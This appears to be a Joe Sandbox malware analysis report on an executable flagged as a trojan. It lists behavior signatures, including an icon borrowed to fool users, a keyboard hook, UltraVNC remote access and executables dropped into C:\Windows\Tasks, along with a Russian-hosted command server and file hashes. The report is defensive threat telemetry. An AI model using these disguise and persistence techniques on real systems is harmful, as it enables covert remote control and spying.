                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579876 Sample: 7q551ugrWe.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 92 52 tbdcic.info 2->52 54 x1.i.lencr.org 2->54 56 bg.microsoft.map.fastly.net 2->56 60 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected UltraVNC Hacktool 2->64 66 4 other signatures 2->66 10 7q551ugrWe.exe 8 2->10         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\WPSela.LSZr7V, PE32+ 10->40 dropped 42 C:\Users\user\AppData\Local\...42fe70s.UFVVkM, PE32+ 10->42 dropped 70 Contains functionality to register a low level keyboard hook 10->70 14 cmd.exe 3 6 10->14         started        18 cmd.exe 6 10->18         started        20 cmd.exe 2 10->20         started        signatures6 process7 file8 44 C:\Windows\Tasks\sync_browser.exe, PE32+ 14->44 dropped 46 C:\Windows\Tasks\conhost.exe, PE32+ 14->46 dropped 72 Drops executables to the windows directory (C:\Windows) and starts them 14->72 22 sync_browser.exe 14->22         started        26 Acrobat.exe 20 61 14->26         started        28 taskkill.exe 1 14->28         started        34 11 other processes 14->34 48 C:\Windows\Tasks\WPSela.LSZr7V, PE32+ 18->48 dropped 50 C:\Windows\Tasks50fe70s.UFVVkM, PE32+ 18->50 dropped 30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        signatures9 process10 dnsIp11 58 tbdcic.info 194.190.152.201, 443, 49732, 49733 RSHB-ASRU Russian Federation 22->58 68 Contains VNC / remote desktop functionality (version string found) 22->68 36 AcroCEF.exe 106 26->36         started        signatures12 process13 process14 38 AcroCEF.exe 2 36->38         started       

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          7q551ugrWe.exe24%ReversingLabs

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V0%ReversingLabs
                          C:\Windows\Tasks\Nfe70s.UFVVkM0%ReversingLabs
                          C:\Windows\Tasks\WPSela.LSZr7V0%ReversingLabs
                          C:\Windows\Tasks\conhost.exe0%ReversingLabs
                          C:\Windows\Tasks\sync_browser.exe0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tbdcic.info
                          		194.190.152.201
                          		truetrue
                            		unknown
                            bg.microsoft.map.fastly.net
                            		199.232.210.172
                            		truefalse
                              		high
                              x1.i.lencr.org
                              		unknown
                              		unknownfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.uvnc.com7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                  		high
                                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.13.drfalse
                                    		high
                                    http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=17q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                      		high
                                      http://www.uvnc.comopenhttp://forum.uvnc.comnet7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                        		unknown
                                        http://crl.thawte.com/ThawteTimestampingCA.crl07q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                          		high
                                          http://java.sun.com/products/plugin/index.html#download7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                            		high
                                            http://forum.uvnc.com7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                              		unknown
                                              http://ocsp.thawte.com07q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                194.190.152.201
                                                		tbdcic.infoRussian Federation
                                                		41615RSHB-ASRUtrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579876
                                                Start date and time:2024-12-23 13:28:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Sample name:7q551ugrWe.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
                                                Detection:MAL
                                                Classification:mal92.troj.spyw.evad.winEXE@50/46@2/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.137, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 162.159.61.3, 172.64.41.3, 23.195.39.65, 199.232.210.172, 2.19.198.27, 23.32.239.56, 13.107.246.63, 23.218.208.109, 54.224.241.105, 23.56.162.204, 172.202.163.200
                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: 7q551ugrWe.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                07:29:21API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                07:29:52API Interceptor11516852x Sleep call for process: sync_browser.exe modified
                                                07:30:05API Interceptor58x Sleep call for process: timeout.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                194.190.152.201T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                  Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                    mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      bg.microsoft.map.fastly.netT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.210.172
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.210.172
                                                      mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.214.172
                                                      eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                      • 199.232.210.172
                                                      0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                      • 199.232.210.172
                                                      #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                      • 199.232.210.172
                                                      p3a0oZ4U7X.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      tbdcic.infoT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      RSHB-ASRUT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      tiago.exeGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                      • 194.190.152.148
                                                      Paralysis Hack.exeGet hashmaliciouszgRATBrowse
                                                      • 194.190.153.137
                                                      file.exeGet hashmalicious000StealerBrowse
                                                      • 194.190.152.193

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                        Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                          mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                              Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\2e47c31f-4094-49f9-939a-86b1e9732874.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223122915Z-174.bmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):66934
                                                                  Entropy (8bit):2.436424201832609
                                                                  Encrypted:false
                                                                  SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                  MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                  SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                  SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                  SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                  Malicious:false
                                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.7485180290352824
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklvEvkfllXlE/HT8khNNX8RolJuRdxLlGB9lQRYwpDdt:kKXlT8kNMa8RdWBwRd
                                                                  MD5:CFE5299ACA35E5152A8BB14AEFAAF715
                                                                  SHA1:B7BED4A79D9AB3D50059A717F698147902F59808
                                                                  SHA-256:E2C710C6CA4B33B81A112855F62490FD5CCCE545078835DEED182E01E606027B
                                                                  SHA-512:059183084CFE6141F68FFD81EED9A593E3517BCAEDE6DEB4587ACF9710FCECBA8EF3532AA7C6426A06C02AAF2B31BF94E60DE72BE8AB93433434FED1CC67ED46
                                                                  Malicious:false
                                                                  Preview:p...... ...........J6U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.2539954282295116
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKkQ3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8QqDImsLNkPlE99SNxAhUe/3
                                                                  MD5:2F315A09A0C59F76C4A72F3601C1E864
                                                                  SHA1:3252B032A8DC3B3CB3A91FF0A6B66793F635112B
                                                                  SHA-256:12ED4791579F285FE3CDA8CB89E979C0D747A24FD8274CB8FB15E551FB5C1C2E
                                                                  SHA-512:E48B5B6DF78B9D463C97422C7E366B35F5AD17436B2EB438347848DF75938F26E76E134130DA1156860691B61BEF8618365F755CE6A5172F9FA6B2C3D3EE0C61
                                                                  Malicious:false
                                                                  Preview:p...... ...........]6U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.323222159693221
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJM3g98kUwPeUkwRe9:YvXKX5VqYpW7EGMbLUkee9
                                                                  MD5:CDB931FED41A332809602F8EE0151012
                                                                  SHA1:AE618022633169395DCD389AC10502DFA79E219C
                                                                  SHA-256:4D38E6AE042719D7768F56B0C27B2DFB2B231D3B76969A84D9C874157450ABD1
                                                                  SHA-512:3DB2E048EE635E3CE36FA9698E971061D903DA4E0E9DD20C1E9AEC28D3D84425C00DC8358F0A0D2EF92C7D552EF735F83B89CFAF41C7843405E4A5E0CDC63127
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.260245438681416
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfBoTfXpnrPeUkwRe9:YvXKX5VqYpW7EGWTfXcUkee9
                                                                  MD5:C2A29AC4529955E96738F288C5F3AF05
                                                                  SHA1:E3DF528376F9E690C05113D888C2098B255DA1E4
                                                                  SHA-256:422C550C360F98ECBD546A590C7DCE188348179C64FFD35D5AB7D39AAF6A17A7
                                                                  SHA-512:8DD50FA516D461546B2F50DB75D49E1FFFB703A877A46ED5FB0DBFDA389FD1BA693E5C9BC7BD6624D7C8F4C64D760AFDC27EE54C3477DD643656BAAE9C554FDF
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.237655701392191
                                                                  Encrypted:false
